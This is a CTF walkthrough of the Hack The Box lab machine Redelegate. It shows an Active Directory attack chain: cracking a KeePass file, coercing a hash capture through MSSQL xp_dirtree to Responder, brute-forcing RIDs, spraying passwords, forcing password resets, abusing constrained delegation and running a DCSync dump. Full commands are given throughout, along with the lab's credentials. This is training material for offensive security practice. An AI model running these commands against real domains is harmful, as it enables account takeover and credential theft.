HTB-Redelegate

Redelegate Hack The Box- Complete Walkthrough & Writeup

Introduction

Welcome to my complete walkthrough of Redelegate from Hack The Box - VulnLab! This challenging Active Directory machine tests your understanding of Kerberos delegation attacks, password cracking, and MSSQL enumeration techniques. In this detailed writeup, I’ll walk you through the entire exploitation chain from anonymous FTP access to domain administrator privileges.

Tools Used: Nmap, Impacket, Hashcat, Keepass2john, BloodHound, NetExec, Evil-WinRM, BloodyAD, Responder

Difficulty: Hard

Key Techniques: Anonymous FTP enumeration, KeePass database cracking, MSSQL authentication relay, Active Directory enumeration, Kerberos Constrained Delegation abuse, DCSync attack

---

Enumeration

Nmap Scan

Starting with our initial port scan, we discover numerous services running on the target:

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24  01:11AM                  434 CyberAudit.txt
| 10-20-24  05:14AM                 2622 Shared.kdbx
|_10-20-24  01:26AM                  580 TrainingAgenda.txt
53/tcp    open  domain?       syn-ack ttl 127
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-21 06:25:37Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal 
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49932/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 

The key findings from this scan are:

• FTP (Port 21): Anonymous login enabled with interesting files
• MSSQL (Port 1433): SQL Server 2019 running
• Kerberos (Port 88): Domain controller identified
• LDAP (Ports 389/3268): Domain name redelegate.vl

FTP Anonymous Access

Since anonymous FTP login is enabled, let’s connect and retrieve the available files:

The CyberAudit.txt file reveals crucial information about recent security findings:

OCTOBER 2024 AUDIT FINDINGS

[!] CyberSecurity Audit findings:

1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs

[*] Remediation steps:

1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS

The TrainingAgenda.txt file provides an important hint about password formats:

EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)

Friday 4th October  | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one


Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?


Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password 


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them% 

This training agenda explicitly mentions the weak password format: SeasonYear!

Finally, we discover a Shared.kdbx KeePass database that’s password protected.

---

Cracking the KeePass Database

Extracting the Hash

First, let’s extract the hash from the KeePass database:

keepass2john Shared.kdbx

Initial Cracking Attempt

I attempted to crack it using the rockyou.txt wordlist:

hashcat -m 29700 hash.txt /usr/share/wordlists/rockyou.txt

However, this doesn’t crack within a reasonable timeframe.

Generating Custom Wordlist

Based on the hint from TrainingAgenda.txt, I created a custom wordlist with the SeasonYear! format:

#!/usr/bin/env python3
# gen_seasons_with_fall.py

seasons = ["Spring", "Summer", "Autumn", "Fall", "Winter"]
symbol = "!"
start_year = 2010
end_year = 2030

out_path = "season_years.txt"

with open(out_path, "w", encoding="utf-8") as f:
    for year in range(start_year, end_year + 1):
        for season in seasons:
            f.write(f"{season}{year}{symbol}\n")

print(f"Wrote {(end_year - start_year + 1) * len(seasons)} lines to {out_path}")

Now crack the hash using our custom wordlist:

hashcat Shared.kdbx.hash season_years.txt --user -m 13400

Success! The password is: Fall2024!

Note: If you have issues cracking, the .kdbx file might be corrupted. Before downloading with get, type binary in your FTP client to ensure proper transfer.

KeePass Database Contents

Opening the database reveals multiple credentials:

FS01 Admin | Administrator:Spdv41gg4BlBgSYIW1gF
FTP | FTPUser:SguPZBKdRyxWzvXRWy6U
SQL Guest Access | SQLGuest:zDPBpaF4FywlqIv11vii
WEB01 | WordPress Panel:cn4KOEgsHqvKXPjEnSD9
KeyFob Combination | 22331144
Payrol App | Payroll:cVkqz4bCM7kJRcd62vqi5X
Timesheet Manager | Timesheet:hMFS4I0Kj8Rcd62vqi5X

---

MSSQL Exploitation

Authenticating to MSSQL

From our Nmap scan, we know MSSQL is running. Let’s use the SQLGuest credentials:

impacket-mssqlclient redelegate/SQLGuest:'zDPBpaF4FywlqIv11vii'@dc.redelegate.vl

Hash Relay Attack

The SQLGuest user has permission to execute xp_dirtree, which we can abuse to relay the hash of the sql_svc account back to ourselves.

Start Responder in one terminal:

sudo responder -I tun0

Then execute the following in MSSQL:

xp_dirtree \\(Your ip)\shared

Unfortunately, the captured hash doesn’t crack, so we need to try a different approach.

---

Domain User Enumeration

Method 1: Metasploit Module

You can use the Metasploit module auxiliary/admin/mssql/mssql_enum_domain_accounts to enumerate domain users.

Method 2: Manual Enumeration

However, during real penetration tests, you might not have access to these tools. Here’s the manual method:

Step 1: Select the domain:

SQL (SQLGuest  guest@master)> select DEFAULT_DOMAIN() as mydomain;

Step 2: Get the domain SID:

SQL (SQLGuest  guest@master)> select SUSER_SID('REDELEGATE\Domain Admins')

Step 3: Remove the 00020000 from the end (this is the RID of the Domain Admins group).

Step 4: Use the following script to brute force user accounts:

#!/bin/bash

SID_BASE="010500000000000515000000a185deefb22433798d8e847a"

for RID in {1000..1500}; do
    HEX_RID=$(python3 -c "import struct; print(struct.pack('<I', ${RID}).hex())")
    SID="${SID_BASE}${HEX_RID}"
    RES=$(impacket-mssqlclient SQLGuest:zDPBpaF4FywlqIv11vii@dc.redelegate.vl -file <( echo "select SUSER_SNAME(0x${SID});") 2>&1 | sed -n '/^----/{n;p;}')
    echo -n $'\r'"${RID}: ${RES}"
    [[ "$(echo "$RES" | xargs)" != "NULL" ]] && echo
done

(Credit to 0xdf and his Discord community for this elegant script)

Discovered Users

Christine.Flanders
Marie.Curie
Helen.Frost
Michael.Pontiac
Mallory.Roberts
James.Dinkleberg
Ryan.Cooper
sql_svc

---

Password Spraying

Now that we have a list of usernames and potential passwords from the KeePass database, let’s perform password spraying:

netexec smb 10.129.234.50 -u usernames.txt -p passwords.txt

Success! We find valid credentials:

[+] redelegate.vl\Marie.Curie:Fall2024!

This account also has LDAP authentication privileges, perfect for BloodHound enumeration.

---

Active Directory Enumeration with BloodHound

Let’s dump LDAP data and ingest it into BloodHound:

netexec ldap 10.129.234.50 -u Marie.Curie -p 'Fall2024!' --bloodhound --dns-server 10.129.234.50 -c ALL --dns-tcp

BloodHound Analysis

After analyzing the data in BloodHound, we discover multiple attack paths:

We have ForceChangePassword privileges on several users, including:

• sql_svc account
• Helen.Frost (who has GenericAll over FS01$)

---

Lateral Movement to Helen.Frost

Let’s pursue the Helen.Frost path since she has powerful permissions. First, we’ll force a password change:

bloodyAD -H 10.129.234.50 -d "REDELEGATE.VL" -u "Marie.Curie" -p 'Fall2024!' set password "Helen.Frost" 'Fall2024!'

Now we can authenticate via WinRM:

Identifying Privileges

Helen.Frost has the SeEnableDelegationPrivilege, which indicates we can abuse Kerberos delegation mechanisms.

There are three types of Kerberos delegation:

• Unconstrained Delegation (KUD): A service can impersonate users on any other service
• Constrained Delegation (KCD): A service can impersonate users on a set of specific services
• Resource-Based Constrained Delegation (RBCD): A set of services can impersonate users on a specific service

Reference: https://www.thehacker.recipes/ad/movement/kerberos/delegations/

I initially explored RBCD, but none of our accounts can add machine accounts (MachineAccountQuota is 0).

---

Privilege Escalation - Administrator

Constrained Delegation Abuse

Since Helen.Frost has GenericAll over FS01$, we can configure Constrained Delegation on the FS01 machine account.

First, connect via PowerShell using Evil-WinRM, then execute:

Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}

What we’ve done:

1. Set the TrustedToAuthForDelegation flag to True on FS01$
2. Added an SPN that allows FS01$ to delegate to the LDAP service on the domain controller

Now FS01$ is allowed to act as the LDAP service on the DC.

Changing FS01$ Password

Next, we need to change the password of the FS01 machine account so we can use it to request service tickets:

bloodyAD -H 10.129.234.50 -d "REDELEGATE.VL" -u "Helen.frost" -p 'Fall2024!' set password 'FS01$' 'Fall2024!'

Requesting Service Ticket with Impersonation

Now we can request a service ticket (ST) while impersonating the domain controller:

impacket-getST 'redelegate.vl/FS01$:Fall2024!' -spn ldap/dc.redelegate.vl -impersonate dc

DCSync Attack

Load the ticket and execute secretsdump to perform a DCSync attack:

KRB5CCNAME=dc.ccache impacket-secretsdump -k -no-pass dc.redelegate.vl

Administrator Access

Finally, use the Administrator hash to authenticate via WinRM and retrieve the root flag:

evil-winrm -i dc.redelegate.vl -u Administrator -H ec1HASHHASHHASH:)

---

Conclusion

Redelegate was an excellent machine for practicing Active Directory attacks, particularly Kerberos delegation abuse. The attack chain involved:

1. Anonymous FTP enumeration
2. KeePass database cracking with custom wordlists
3. MSSQL authentication and user enumeration
4. Password spraying to gain initial access
5. BloodHound analysis to identify attack paths
6. Abusing Constrained Delegation to achieve domain compromise

Key Takeaways:

• Always enumerate thoroughly - the training agenda hint was crucial
• Custom wordlists are often more effective than generic ones
• BloodHound is invaluable for identifying complex AD attack paths
• Understanding Kerberos delegation is essential for advanced AD exploitation